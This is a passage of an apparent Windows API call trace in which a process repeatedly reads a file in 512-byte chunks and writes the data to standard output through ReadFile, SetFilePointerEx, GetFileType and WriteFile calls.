nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.283] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.284] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] GetFileType (hFile=0x50) returned 0x1 [0151.284] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.284] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.285] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.285] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.285] GetFileType (hFile=0x50) returned 0x1 [0151.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] GetFileType (hFile=0x50) returned 0x1 [0151.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.286] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.287] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.287] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] GetFileType (hFile=0x50) returned 0x1 [0151.287] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.287] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.288] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.288] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] GetFileType (hFile=0x50) returned 0x1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.288] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.288] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] GetFileType (hFile=0x50) returned 0x1 [0151.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.289] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.289] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.289] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.289] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.291] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.291] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.292] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.292] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | 